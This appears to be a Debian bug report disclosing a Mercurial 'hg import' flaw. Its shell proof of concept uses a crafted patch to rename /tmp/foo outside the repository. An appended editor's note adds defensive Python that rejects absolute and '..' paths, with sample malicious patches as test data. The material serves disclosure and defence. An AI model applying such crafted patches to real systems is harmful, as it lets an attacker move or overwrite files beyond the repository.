Package: mercurial
Severity: grave
Tags: security, patch
Justification: user security hole
Hi,

It is possible to rename arbitrary files, even outside the repository, by using a maliciously crafted patch.

Proof of concept:

$ echo quux > /tmp/foo
$ cat /tmp/foo /tmp/bar
quux
cat: /tmp/bar: No such file or directory
$ hg init hg-sandbox; cd hg-sandbox
$ hg import - <<EOF
> diff --git a/a b/b
> rename from /tmp/foo
> rename to /tmp/bar
> EOF
applying patch from stdin
/tmp/foo not tracked!
abort: /tmp/bar not under root
$ cat /tmp/foo /tmp/bar
cat: /tmp/foo: No such file or directory
quux

The issue has been fixed upstream[0]. Please upload with high urgency to make sure the fix reaches testing soon.

Cheers
Steffen

[0]: http://www.selenic.com/hg/rev/87c704ac92d4
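Editor's note: the transcript above shows the order-of-operations problem behind this report. The rename of /tmp/foo to /tmp/bar has already happened by the time hg import prints "abort: /tmp/bar not under root", so the containment check ran after the filesystem was modified. The following Python is an added example of how such a check can be done up front, before any file is touched. It is not Steffen's code and not Mercurial's upstream fix (the contents of rev 87c704ac92d4 are not reproduced here); the patch texts are constructed samples, and `audit_path`, `parse_rename_headers`, `is_safe` and `resolve_under_root` are hypothetical names introduced for this illustration.

```python
import os
import posixpath
import re

# Constructed sample inputs (not real Mercurial changesets). The first one
# has the shape of the patch from the bug report above.
MALICIOUS_PATCH = (
    "diff --git a/a b/b\n"
    "rename from /tmp/foo\n"
    "rename to /tmp/bar\n"
)
TRAVERSAL_PATCH = (
    "diff --git a/a b/b\n"
    "rename from a\n"
    "rename to ../../outside\n"
)
BENIGN_PATCH = (
    "diff --git a/a b/b\n"
    "rename from a\n"
    "rename to b\n"
)

# git-style extended header lines that carry a second, patch-controlled path
HEADER_RE = re.compile(r"^(rename from|rename to|copy from|copy to) (.+)$")


class UnsafePath(Exception):
    """Raised when a patch names a path that would escape the repository."""


def audit_path(path):
    """Reject a patch-supplied path unless it is a plain relative path.

    Hypothetical check (not Mercurial's own code). It refuses empty paths,
    NUL bytes, absolute paths (POSIX and, conservatively, Windows drive-letter
    forms) and any '', '.' or '..' component, so a rename or copy can only
    land inside the working directory.
    """
    if not path or "\0" in path:
        raise UnsafePath("empty or NUL-containing path: %r" % path)
    if posixpath.isabs(path) or os.path.isabs(path) or re.match(r"^[A-Za-z]:", path):
        raise UnsafePath("absolute path not under root: %r" % path)
    for part in path.replace("\\", "/").split("/"):
        if part in ("", ".", ".."):
            raise UnsafePath("component %r escapes root in %r" % (part, path))
    return path


def parse_rename_headers(patch_text):
    """Return [(kind, path), ...] for rename/copy headers, auditing each path.

    Raises UnsafePath before returning anything, i.e. before a caller could
    touch the filesystem. That ordering is what the report above shows was
    missing: the rename happened first and only then was /tmp/bar refused.
    """
    ops = []
    for line in patch_text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            ops.append((m.group(1), audit_path(m.group(2))))
    return ops


def is_safe(patch_text):
    """True if every rename/copy path in the patch passes audit_path."""
    try:
        parse_rename_headers(patch_text)
    except UnsafePath:
        return False
    return True


def resolve_under_root(root, path):
    """Join an audited path to the repository root and confirm, after symlink
    resolution, that the result still lies inside root. This second check
    catches a tracked symlink that points outside the working directory,
    which the purely lexical audit_path cannot see."""
    audit_path(path)
    root_real = os.path.realpath(root)
    full = os.path.realpath(os.path.join(root_real, path))
    if os.path.commonpath([root_real, full]) != root_real:
        raise UnsafePath("%r resolves outside %r" % (path, root_real))
    return full


if __name__ == "__main__":
    for name, text in (("malicious", MALICIOUS_PATCH),
                       ("traversal", TRAVERSAL_PATCH),
                       ("benign", BENIGN_PATCH)):
        print("%-9s safe=%s" % (name, is_safe(text)))
```

The two checks are deliberately separate: `audit_path` is lexical and cheap, so it can run over the whole patch before any I/O, while `resolve_under_root` needs the real working directory and is the last gate before each rename or copy is actually performed.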